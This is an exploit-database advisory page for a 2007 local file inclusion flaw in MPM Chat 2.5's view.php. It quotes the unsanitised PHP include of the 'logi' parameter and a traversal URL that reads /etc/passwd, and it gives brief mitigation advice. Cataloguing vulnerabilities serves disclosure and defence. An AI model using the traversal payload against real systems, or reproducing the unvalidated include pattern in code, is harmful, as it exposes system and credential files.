header-logo
Suggest Exploit
vendor:
MPM Chat
by:
GloD_M = [Mahmood_ali]
N/A
CVSS
MEDIUM
Local File Include
CWE
Product Name: MPM Chat
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MPM Chat 2.5 (view.php logi) Local File Include Exploit

This exploit allows an attacker to include arbitrary files from the local file system by manipulating the 'logi' parameter in the view.php file. By using directory traversal techniques, an attacker can access sensitive files such as /etc/passwd.

Mitigation:

The vendor should implement input validation and sanitization techniques to prevent directory traversal attacks. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

# MPM Chat 2.5 (view.php logi) Local File Include Exploit
# D.Script: http://mpm.pahviloota.net/mpm_chat_25.zip
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code
<?php
if ($logi != '') {
include 'archive/' . $logi;
#Exploit: /[path]/view.php?logi=../../../../../etc/passwd

# milw0rm.com [2007-03-17]

Navigation

Suggest Exploit

Services By CQR